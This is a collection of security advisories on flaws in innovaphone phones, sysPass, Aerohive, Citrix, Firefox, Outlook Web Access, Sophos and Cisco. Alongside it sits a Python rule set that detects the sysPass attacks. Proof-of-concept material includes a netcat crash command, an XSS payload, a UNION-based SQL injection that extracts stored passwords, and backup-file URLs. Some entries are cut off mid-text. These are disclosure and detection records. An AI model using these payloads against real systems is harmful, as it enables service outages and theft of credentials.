[SYSS-2015-053] innovaphone IP222/IP232 - Denial of Service
Advisory ID: SYSS-2015-053
Product: innovaphone IP222/IP232
Manufacturer: innovaphone AG
Affected Version(s): 11r1s r2
Tested Version(s): 11r1s r2
Vulnerability Type: Denial of Service (CWE-730)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2015-09-02
Solution Date: unknown
Public Disclosure: 2016-03-04
CVE Reference: Not yet assigned
Author of Advisory: Alexander Brachmann (SySS GmbH)

Overview:

The innovaphone IP222 and IP232 are IP telephones with many features.

The manufacturer innovaphone describes the products as follows (see [1], [2]):

"The IP222 telephone unites a very modern design with groundbreaking technological details. It belongs to the innovaphone product family that won the popular "red dot award: product design". (...) The innovaphone IP232 IP phone unites a very modern design with groundbreaking technological details. It belongs to the innovaphone design telephone product range that won the coveted "red dot award: product design"."

Due to a vulnerability in the H.323 network service on TCP port 1720, the telephone can be restarted in an unauthorized manner by an attacker, causing a denial-of-service condition.

Vulnerability Details:

A not further analyzed vulnerability in the H.323 network service on TCP port 1720 of the IP telephone IP222 can be exploited by an attacker on the same network to reboot the telephone in an unauthorized way.

This vulnerability can be used for denial-of-service attacks against the IP222 telephone in arbitrary states, for example during a call. If the IP222 telephone is configured in such a way that its users are not automatically logged in after a reboot, the impact of this denial-of-service attack is even bigger, as user interaction is required to restore the IP telephone to its previous working state.

Proof of Concept (PoC):

The IP telephone IP222 can be rebooted in an unauthorized way by sending random data to its H.323 network service on TCP port 1720, for example by using the following command:

$ cat /dev/urandom | nc 1720

Before rebooting, the CPU register state is shown on the telephone's display (white text on red background).

Solution:

According to test results of the SySS GmbH with the newer firmware version 11r2 sr9, the reported security issue was fixed by the manufacturer. Please contact the manufacturer for further information or support.

Disclosure Timeline:

2015-09-04: Vulnerability reported to manufacturer
2015-09-07: Manufacturer acknowledges e-mail with SySS security advisory and asks for further information
2015-09-08: Response to open question
2015-11-06: E-mail to manufacturer asking about the current state of the reported security issue
2015-11-06: Manufacturer cannot reproduce the security issue; detailed information on how the security vulnerability can be triggered is provided
2015-11-09: E-mail to manufacturer asking about the current state of the reported security issue
2015-11-12: Further e-mail to manufacturer asking about the current state of the reported security issue
2016-03-03: Test of the security vulnerability with the newer firmware version 11r2 sr9, where no DoS condition could be triggered anymore
2016-03-04: Public release of security advisory

References:

[1] innovaphone IP222 product Web site
    http://www.innovaphone.com/en/ip-telephony/ip-phones/ip222.html
[2] innovaphone IP232 product Web site
    http://www.innovaphone.com/en/ip-telephony/ip-phones/ip232.html
[3] SySS Security Advisory SYSS-2015-053
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-053.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

Credits:

This security vulnerability was found by Alexander Brachmann of the SySS GmbH.

E-Mail: alexander.brachmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Alexander_Brachmann.asc
Key fingerprint = 8E49 74AF 34A6 E600 E958 FB63 2E8E 1546 17DE CFFE

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as p
[SYSS-2015-047] sysPass - Cross-Site Scripting (CWE-79)
Advisory ID: SYSS-2015-047
Product: sysPass
Vendor: http://cygnux.org/
Affected Version(s): 1.1.2.23 and below
Tested Version(s): 1.1.2.23
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-07-14
Solution Date: 2015-10-26
Public Disclosure: 2015-12-07
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)

Overview:

sysPass is a web-based password manager written in PHP and Ajax with a built-in multiuser environment. The functionality "Account Details" is prone to a reflected cross-site scripting vulnerability.

The software manufacturer describes the web application as follows (see [1]):

"sysPass is a web password manager written in PHP that allows the password management in a centralized way and in a multiuser environment. The main features are:
* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."

Vulnerability Details:

The PHP script ajax_getContent.php of the web application functionality "Account Details" is vulnerable to reflected cross-site scripting via the parameter "lastAction". The web application sysPass inserts the injected code into the "back" button of the result web page, where it can be triggered.

This reflected cross-site scripting vulnerability can be exploited in the context of an authenticated user by sending a specially crafted HTTP POST request (see PoC section).

Proof of Concept (PoC):

The following HTTP POST request using the JavaScript code "'-alert(1)-'" as the value for the parameter "lastAction" demonstrates the reflected cross-site scripting vulnerability by showing a JavaScript alert box after the "back" button was clicked:

POST /sysPass/ajax/ajax_getContent.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/sysPass/index.php
Content-Length: 74
Cookie: PHPSESSID=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=accview&lastAction=accsearch'-alert(1)-'&id=1&isAjax=1

The server answers as follows:

HTTP/1.1 200 OK
(...)

(...)

Solution:

The reported security vulnerability has been fixed in a new software release. Update to the new software version.

Disclosure Timeline:

2015-07-14: Vulnerability discovered
2015-07-14: Vulnerability reported to vendor
2015-10-26: Release of new software version that addresses the reported security issue
2015-12-07: Public release of security advisory

References:

[1] Web site of sysPass - sysadmin password manager
    http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-047
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-047.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

Credits:

This security vulnerability was found by Daniele Salaris of the SySS GmbH.

E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
[SYSS-2015-046] sysPass - Insecure Direct Object References (CWE-932)
Advisory ID: SYSS-2015-046
Product: sysPass
Manufacturer: http://cygnux.org/
Affected Version(s): 1.0.9 and below
Tested Version(s): 1.0.9
Vulnerability Type: Insecure Direct Object References (CWE-932)
                    Exposure of Backup File to an Unauthorized Control Sphere (CWE-530)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-06-10
Solution Date: 2015-10-26
Public Disclosure: 2015-12-07
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)

Overview:

sysPass is a web-based password manager written in PHP and Ajax with a built-in multiuser environment. The web application is prone to a security vulnerability that allows an unauthorized attacker to download existing backup files containing sensitive data.

The software manufacturer describes the web application as follows (see [1]):

"sysPass is a web password manager written in PHP that allows the password management in a centralized way and in a multiuser environment. The main features are:
* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."

Vulnerability Details:

The backup functionality of the web-based password manager sysPass creates the following two backup files, which are stored within the application's backup folder:

* sysPass_db.sql
* sysPass.tar.gz

The file sysPass_db.sql contains a full database dump, and the file sysPass.tar.gz contains all contents of the sysPass web application folder.

An unauthorized attacker can simply download these two existing backup files via the following URLs:

http(s):///backup/sysPass_db.sql
http(s):///backup/sysPass.tar.gz

Thus, an external attacker without valid user credentials can gain unauthorized access to all configuration and application data of the password manager sysPass. With access to this data, an attacker can perform further attacks in order to recover user credentials of sysPass users or to decrypt encrypted password information contained within the database.

Proof of Concept (PoC):

The following URLs can be used to download existing backup files of the password manager sysPass from an external attacker's perspective:

http(s):///backup/sysPass_db.sql
http(s):///backup/sysPass.tar.gz

For example:

http://syspass.org/demo/backup/sysPass_db.sql
http://syspass.org/demo/backup/sysPass.tar.gz

Solution:

The reported security vulnerabilities have been fixed in a new software release. Update to the new software version.

Disclosure Timeline:

2015-06-08: Vulnerability discovered
2015-06-10: Vulnerability reported to manufacturer
2015-10-26: Release of new software version that addresses the reported security issues; security fix discussed with manufacturer
2015-12-07: Public release of security advisory

References:

[1] Web site of sysPass - sysadmin password manager
    http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-046
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-046.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

Credits:

This security vulnerability was found by Daniele Salaris of the SySS GmbH.

E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
[SYSS-2015-031] sysPass - SQL Injection
Advisory ID: SYSS-2015-031
Product: sysPass
Vendor: http://cygnux.org/
Affected Version(s): 1.0.9 and below
Tested Version(s): 1.0.9
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2014-07-27
Solution Date: 2014-08-04
Public Disclosure: 2015-07-13
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)

Overview:

sysPass is a web-based password manager written in PHP and Ajax with a built-in multiuser environment. An SQL injection vulnerability was identified in one of the requests of this web password manager.

The software manufacturer describes the web application as follows (see [1]):

"sysPass is a web password manager written in PHP that allows the password management in a centralized way and in a multiuser environment. The main features are:
* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."

Vulnerability Details:

The SQL injection vulnerability was found in an HTTP POST request of the AJAX component of the sysPass software. The attribute getAccounts is not correctly sanitized and can therefore be abused to inject arbitrary SQL statements.

This SQL injection vulnerability can be exploited by an authenticated attacker by sending a specially crafted HTTP POST request (see PoC section).

Proof of Concept (PoC):

The following HTTP request can be used to extract information from the database:

POST /sysPass-1.0.9/ajax/ajax_search.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http:///sysPass-1.0.9/index.php
Content-Length: 249
Cookie: PHPSESSID=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search=getAccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pass,account_url,NULL,NULL,NULL,NULL,NULL from accounts -- &start=0&skey=1&sorder=1&sk=081bad3198bdb3cd29133befc57d60287541663b&is_ajax=1&customer=0&category=0&rpp=10

The server answers as follows:

HTTP/1.1 200 OK
Date: Fri, 10 Jul 2015 14:06:04 GMT
Server: Apache/2.4.12 (Unix) PHP/5.6.10
X-Powered-By: PHP/5.6.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=; path=/; HttpOnly
Content-Length: 1147
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

CustomerNameCategoryUserURL / IPTEST_USERTEST_NAMETEST_URL1 @ 0.00478 s Filter ON 1 / 1

Solution:

Update sysPass to the latest software version.

Disclosure Timeline:

2014-07-27: Vulnerability discovered
2014-07-27: Vulnerability reported to vendor
2014-08-04: Vendor releases new fixed version of sysPass
2015-07-13: Public release of security advisory

References:

[1] Web site of sysPass - sysadmin password manager
    http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-031
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-031.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

Credits:

This security vulnerability was found by Daniele Salaris of the SySS GmbH.

E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

Copyright:

Creative Commons - Attribution (by) - Ve
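Detection logic for the three sysPass advisories above (SYSS-2015-031 SQL injection, SYSS-2015-046 backup file exposure, SYSS-2015-047 reflected XSS), as an added example that is not part of the advisories or of sysPass itself: it parses raw HTTP requests in the same form the PoC sections quote them, as a reverse proxy or WAF hook would see them, and flags unauthenticated backup downloads, non-alphabetic lastAction values and SQL meta-characters in the search parameter. The host name, the rule names and the action-name allowlist pattern are assumptions.

```python
"""Detection rules for the sysPass findings SYSS-2015-031, -046 and -047.
Added example (not sysPass code): raw HTTP requests are parsed the way a
reverse proxy or WAF hook would see them, then matched against three rules."""
import re
from urllib.parse import parse_qs, unquote

# Backup files named in SYSS-2015-046; any request for them is reportable,
# since the application never needs them served over HTTP.
BACKUP_FILES = ("/backup/sysPass_db.sql", "/backup/sysPass.tar.gz")

# Assumed allowlist pattern for sysPass action names: the advisories show only
# lower-case words ("accview", "accsearch"); anything else in lastAction is
# treated as a reflection attempt (SYSS-2015-047).
ACTION_RE = re.compile(r"^[a-z]+$")

# SQL meta-characters for the "search" parameter (SYSS-2015-031): a quote
# closing a literal before ")", a UNION ... SELECT, or a trailing comment.
SQLI_RE = re.compile(r"(['\"]\s*\)|\bunion\s+(?:all\s+)?select\b|--\s*$|/\*)",
                     re.IGNORECASE)


def parse_http_request(raw):
    """Parse one raw HTTP/1.1 request (request line, headers, blank line,
    body) into a dict. Parameters come from the query string and, for
    application/x-www-form-urlencoded bodies, from the body; the last
    occurrence of a repeated name wins, as PHP's $_POST behaves."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update({k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()})
    return {"method": method, "path": unquote(path), "headers": headers, "params": params}


def detect(req):
    """Return (rule, cwe, evidence) tuples for one parsed request."""
    findings = []
    path, params = req["path"], req["params"]
    if any(path.endswith(name) for name in BACKUP_FILES):
        findings.append(("syspass-backup-download", "CWE-530", path))
    if path.endswith("/ajax/ajax_getContent.php"):
        last_action = params.get("lastAction", "")
        if last_action and not ACTION_RE.match(last_action):
            findings.append(("syspass-reflected-xss", "CWE-79", last_action))
    if path.endswith("/ajax/ajax_search.php"):
        search = params.get("search", "")
        if SQLI_RE.search(search):
            findings.append(("syspass-sql-injection", "CWE-89", search))
    return findings


def scan(raw_requests):
    """Rule names triggered per request; an empty list means benign."""
    return [[f[0] for f in detect(parse_http_request(r))] for r in raw_requests]


# Constructed sample traffic. The two attack bodies are the PoC payloads
# quoted in the advisories above; the host name is a placeholder.
FORM = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
SAMPLE_REQUESTS = [
    "GET /backup/sysPass_db.sql HTTP/1.1\r\nHost: syspass.example\r\n\r\n",
    "POST /sysPass/ajax/ajax_getContent.php HTTP/1.1\r\nHost: syspass.example\r\n"
    + FORM + "\r\naction=accview&lastAction=accsearch'-alert(1)-'&id=1&isAjax=1",
    "POST /sysPass-1.0.9/ajax/ajax_search.php HTTP/1.1\r\nHost: syspass.example\r\n"
    + FORM + "\r\nsearch=getAccounts') UNION ALL SELECT NULL,NULL,account_name,"
    "account_login,account_pass,account_url,NULL,NULL,NULL,NULL,NULL from accounts -- "
    "&start=0&skey=1&sorder=1&is_ajax=1&customer=0&category=0&rpp=10",
    "POST /sysPass/ajax/ajax_getContent.php HTTP/1.1\r\nHost: syspass.example\r\n"
    + FORM + "\r\naction=accview&lastAction=accsearch&id=1&isAjax=1",
]

if __name__ == "__main__":
    for raw, hits in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(raw.split("\r\n", 1)[0], "->", hits or "benign")
```

The first three sample requests each trigger exactly one rule and the fourth, a legitimate "Account Details" call, triggers none; on a fixed sysPass installation the backup rule should additionally be paired with a web-server deny rule for the backup folder.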
Aerohive Hive Manager and Hive OS Multiple Vulnerabilities
Affected Versions: Aerohive Hive Manager (Stand-alone and Cloud) >= 6.1R3 and HiveOS 6.1R3
PDF: http://www.security-assessment.com/files/documents/advisory/Aerohive%20Hive%20Manager%20and%20Hive%20OS%20Multiple%20Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

This document details multiple vulnerabilities found within the Aerohive Hive Manager and HiveOS software. These vulnerabilities were disclosed to the vendor on or before the 24th of April 2014.

-- Hive Manager Arbitrary File Disclosure --

Leveraging directory traversal, a malicious user can retrieve arbitrary files from the Hive Manager file system. As the Tomcat instance serving the Hive Manager software runs as the root user, this vulnerability can be used to read any file off the file system, including sensitive files such as /etc/shadow.

-- Hive Manager Arbitrary File Upload --

An authenticated malicious user may send a crafted POST to the 'upload' servlet and upload arbitrary files. As the upload servlet is protected by HTTP basic authentication, this requires knowledge of the scpuser's password.

-- Hive Manager Debugserver Code Execution --

It was discovered that an authenticated user may send a crafted request to the Hive Manager 'debugserver' servlet and execute arbitrary commands on the Hive Manager server.

-- Hive Manager Multiple Password Disclosure --

Multiple methods within the Hive Manager web interface were found to expose sensitive information such as usernames and passwords. A malicious entity may leverage these disclosures to further compromise the Hive Manager.

-- Hive Manager Reflected Cross Site Scripting --

Multiple reflected cross site scripting vulnerabilities were found within the Hive Manager software. These vulnerabilities allow a malicious entity to potentially gain JavaScript execution within a legitimate user's browser, with the aim of harming the user's browser or hijacking their session.

-- Hive Manager SSH Keys Lacking Passphrase --

An SSH key was found on the Hive Manager file system without any passphrase set. This allows a malicious user with access to the file system to gain unauthorised access to the system with root user privileges.

-- Hive Manager Subshell Bypass --

By using a crafted SSH command, a malicious user may gain root access to the Hive Manager with a fully functional bash terminal, effectively bypassing the Aerohive subshell. This allows the malicious user to perform tasks on the underlying CentOS Linux operating system, including the retrieval of private keys, passwords and other sensitive information.

-- Hive Manager Unauthenticated Arbitrary File Upload --

The Hive Manager HHMUploadServlet was found to suffer from an unauthenticated arbitrary file upload vulnerability. By sending a crafted packet to the servlet, a malicious entity is able to gain arbitrary code execution on the Hive Manager server.

-- HiveOS Local File Inclusion --

Aerohive HiveOS was found to contain a local file inclusion vulnerability within the web administrative interface. The local file inclusion allows a malicious entity to control which files are included by the vulnerable PHP page. In the event that the malicious entity is able to control an element on the file system, this results in arbitrary code execution. As user-controlled information is present within the log files of the application, this is easily achievable.

-- HiveOS Password Disclosure --

Log files within the HiveOS operating system were found to disclose sensitive information such as usernames and passwords. A malicious user may leverage this information to further compromise the Aerohive deployment or its users.

-- HiveOS Unauthenticated Firmware Upload --

Insufficient authorisation checking was found to be performed on certain firmware upload functions. This allows for the upload of a backdoored or otherwise malicious firmware by an attacker.

+--------------+
| Exploitation |
+--------------+

Detailed exploitation information and code will be released in December 2014.

+------------+
| Workaround |
+------------+

Update to the latest version of Hive Manager and HiveOS software, including the cloud solutions.

+--------+
| Credit |
+--------+

Denis Andzakovic, Scott Bell, Nick Freeman, Thomas Hibbert, Carl Purvis, Pedro Worcel.

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+
Heap Offset Overflow in Citrix ICA Clients
===ADVISORY===
Systems Affected: Citrix ICA Client
Severity: High
Category: Heap Offset Overflow
Author: Context Information Security Ltd
Reported to vendor: 20th February 2008
Advisory Issued: 4th August 2010
===ADVISORY===

Description
-----------

The Citrix Presentation Server Client (tested on v10.150) does not perform bounds checking on the type field in an ICA "graphics" packet. This lack of checking allows for remote exploitation of a user that has the client installed. The exploit can be triggered by sending a user to a malicious web page that causes an ICA file to be downloaded. This automatically connects to a simulated ICA server, which can trigger the remote code execution and take control over the client.

Analysis
--------

The ICA client software is vulnerable to an offset overflow heap exploit. The ICA client does not correctly validate input from network data in the graphics packets. This allows arbitrary code execution on a victim's computer that connects to a malicious ICA server.

A user with the ICA client installed will automatically connect to an ICA server that is provided via a URL. Therefore, if a user clicks on a malicious link, opens an ".ICA" file via email or is redirected to a malicious server, the exploit will be launched against the user.

The exploit works by providing an ".ICA" file to the web browser which instructs the browser to load the ICA client and connect to the malicious server. The server is not a real ICA server but software which simulates the initial negotiation of an ICA connection and then launches the exploit.

Technologies Affected
---------------------

Citrix Client 10 for Windows, Mac, Linux, Solaris and Windows Mobile

Vendor Response
---------------

Citrix advise users to upgrade to the latest version of the Citrix client. See the following Citrix support article for more details:

http://support.citrix.com/article/CTX125975

Disclosure Timeline
-------------------

20th February 2008 - Vendor Notification
26th February 2008 - Vendor Response for more Details
3rd March 2008 - Vendor Confirm Vulnerability
3rd August 2010 - Vendor Patch Released

Credits
-------

Michael Jordon of Context Information Security Ltd

About Context Information Security
----------------------------------

Context Information Security is an independent security consultancy specialising in both technical security and information assurance services. The company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners. We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and the independence, integrity and technical skills of our consultants. The company's client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations. The best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report.

Web: www.contextis.co.uk
Email: disclos...@contextis.co.uk
Context IS Advisory - Autocomplete Data Theft in Mozilla Firefox
===ADVISORY===
Name: Autocomplete Data Theft in Mozilla Firefox
Systems Affected: Mozilla Firefox 3.5, Mozilla Firefox 3.0
Severity: Moderate
Category: Data Leakage
Author: Context Information Security Ltd
Advisory: 4 November 2009
CVE: CVE-2009-3370
===ADVISORY===

Description
-----------

A malicious web page can extract all the data stored within the autocomplete history of a user's Firefox browser. The web page must convince a user to hold down the left or right arrow keys; then the contents of the autocomplete popup can be read. This may include the search history box within the browser, or other personal details.

Analysis
--------

A malicious web page can be created that includes a text field with the same 'name' attribute as data entered on other sites (e.g. 'q' for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the 'a' key, autocomplete entries starting with that letter will be shown. Entries in the popup can be selected by using the up/down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.

In Firefox, a web page can use the 'createEvent' and 'initKeyEvent' JavaScript methods to create synthetic key events. It was discovered that these events could be used to trigger an autocomplete popup and change the currently selected entry in the popup. However, it was not possible for synthetic events to cause the text field to be filled with the current entry. Therefore some user interaction is required to enable the web page to steal the contents of the drop-down. If a web page can convince a user to hold down or repeatedly press the left or right arrow keys, it can systematically grab each entry in the drop-down box.

Technologies Affected
---------------------

Mozilla Firefox 3.5.3 and below
Mozilla Firefox 3.0.0.14 and below

Resolution
----------

Mozilla fixed this issue in the 3.5.4 and 3.0.0.15 releases of Firefox:

http://www.mozilla.org/security/announce/2009/mfsa2009-52.html

CVE
---

This issue has been assigned CVE number CVE-2009-3370.

Disclosure Timeline
-------------------

8th August 2009 - Initial Discovery and Vendor Notification
8th August 2009 - Vendor Response
27 October 2009 - Vendor Advisory Release
4 November 2009 - Context Information Security Advisory Release

Credits
-------

Paul Stone of Context Information Security Ltd

About Context Information Security
----------------------------------

Context Information Security Limited is a specialist information security consultancy based in London and Dusseldorf. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority.

Web: www.contextis.co.uk
Email: disclos...@contextis.co.uk
Context IS Advisory - MS08-39 OWA XSS
===ADVISORY===
Systems Affected: Microsoft Outlook Web Access 2003 and 2007 (Exchange Server 2003 SP2, Exchange Server 2007, Exchange Server 2007 SP1)
Severity: High
Category: Cross Site Scripting, Cross Site Request Forgery
Author: Context Information Security Ltd
Reported to vendor: 10th January 2008
Advisory Issued: 10th July 2008
===ADVISORY===

Description
-----------

Several cross site scripting vulnerabilities were found within Outlook Web Access (OWA) 2003/2007. An attacker can craft a malicious email which will trigger within a user's browser. Different versions of OWA and different clients (Light and Premium) have different attack vectors, which can result in an attacker gaining *persistent* control over a victim's use of Outlook Web Access. An attacker would have full control and access to the victim's e-mail account. This control could be further abused by utilising techniques such as JavaScript root-kits or web worms.

Analysis
--------

An attacker can craft a malicious email which contains the attack strings to compromise an OWA client. The user would only need to view the email to fall victim to the XSS attack.

Furthermore, persistent XSS can be gained by changing certain values within OWA to a particular XSS attack string. This string (consisting of HTML/JavaScript) is subsequently injected into *any* page which uses this value, including "new email", "reply email" (for OWA 2003) and most pages (for OWA 2007). Logging out of the application and back in will not clear the attack.

Furthermore, the attack can be propagated by using the control over the OWA client to email the attack link to all users in the victim's inbox/contacts. At this point the attack would spread as an XSS worm (albeit one requiring the user to view the incoming email). This could potentially affect all users of the OWA application.

Technologies Affected
---------------------

Microsoft Exchange Server 2003
Microsoft Exchange Server 2007
Microsoft Exchange Server 2007 SP1

Vendor Response
---------------

On 9th July 2008, Microsoft issued security bulletin MS08-039 and an associated patch for Exchange Server 2003 and Exchange Server 2007 SP1. Patches are available from:

http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx

Context would recommend that these patches be installed as soon as practical on all Exchange Servers providing OWA functionality.

CVE
---

This issue has been assigned CVE numbers CVE-2008-2247 and CVE-2008-2248.

Disclosure Timeline
-------------------

10 January 2008 - Initial Discovery and vendor notification.
14th January 2008 - Vendor response requesting further details.
14th March 2008 - Vendor response requesting PoC. PoC provided.
9th July 2008 - Vendor advisory release.
10th July 2008 - Context Information Security Ltd advisory release.

Credits
-------

Michael Jordon of Context Information Security Ltd

About Context Information Security
----------------------------------

Context Information Security Limited is a specialist information security consultancy based in London and Frankfurt. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority.

Web: www.contextis.co.uk
Email: [EMAIL PROTECTED]
Sophos Anti-Virus 6.5.4 Vulnerability
Name: Cross Site Scripting Vulnerability in Sophos Anti-Virus
Systems Affected: Sophos Anti-Virus, version 6.5.4 R2
Severity: Medium
Category: Cross Site Scripting
Author: Context Information Security Ltd
Advisory: 6th September 2007

Description
-----------

A ZIP archive containing a virus signature with a malformed file name will cause a cross site scripting vulnerability to be triggered from within the Sophos Anti-Virus client.

Analysis
--------

When Sophos Anti-Virus scans a specially crafted ZIP archive containing an XSS attack string, it will internally log the string. When this information is accessed via the Sophos client (SavMain.exe), the XSS attack string is unencoded. When the print function is called, the application can be used to run arbitrary code on the target machine from a file submitted by an external attacker.

Technologies Affected
---------------------

Sophos Anti-Virus, version 6.5.4 R2

Resolution
----------

Update to version 6.5.8 or 7.0.

Vendor Response
---------------

Sophos have patched this issue in version 7.01.

CVE Details
-----------

This issue has been provisionally assigned a CVE candidate number of CVE-2007-4512.

Disclosure Timeline
-------------------

18 April 2007 - Initial Discovery and vendor notification
19 April 2007 - Vendor Response
21 August 2007 - Second Vendor Response
6 September 2007 - Coordinated Public Release

Credits
-------

Michael Jordon of Context Information Security Ltd

About Context Information Security
----------------------------------

Context Information Security Limited is a specialist information security consultancy based in London and Frankfurt. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority.

Web: www.contextis.co.uk
Email: [EMAIL PROTECTED]

About Sophos
------------

"Sophos is a world leader in IT security and control solutions purpose-built for business, education, government organizations and service providers. Our reliably engineered, easy-to-operate products protect over 100 million users in more than 150 countries from viruses, spyware, adware, Trojans, intrusion, spam, policy abuse, and uncontrolled network access."
XSS vulnerability in Cisco MeetingPlace
SecureTest Ltd (www.securetest.com) Security Advisory

XSS vulnerability in Cisco MeetingPlace

Date: 18th July 2007
Author: Roger Jefferiss
Application: Cisco MeetingPlace
Risk: Medium
Vendor Status: Replicated and verified by Cisco Systems, patch available.
Reference: http://www.cisco.com

Overview:
There is a cross-site scripting issue in the Cisco MeetingPlace application. As a result, a specially crafted web page containing hidden script can cause arbitrary code to be executed on the host accessing the application.

Details:
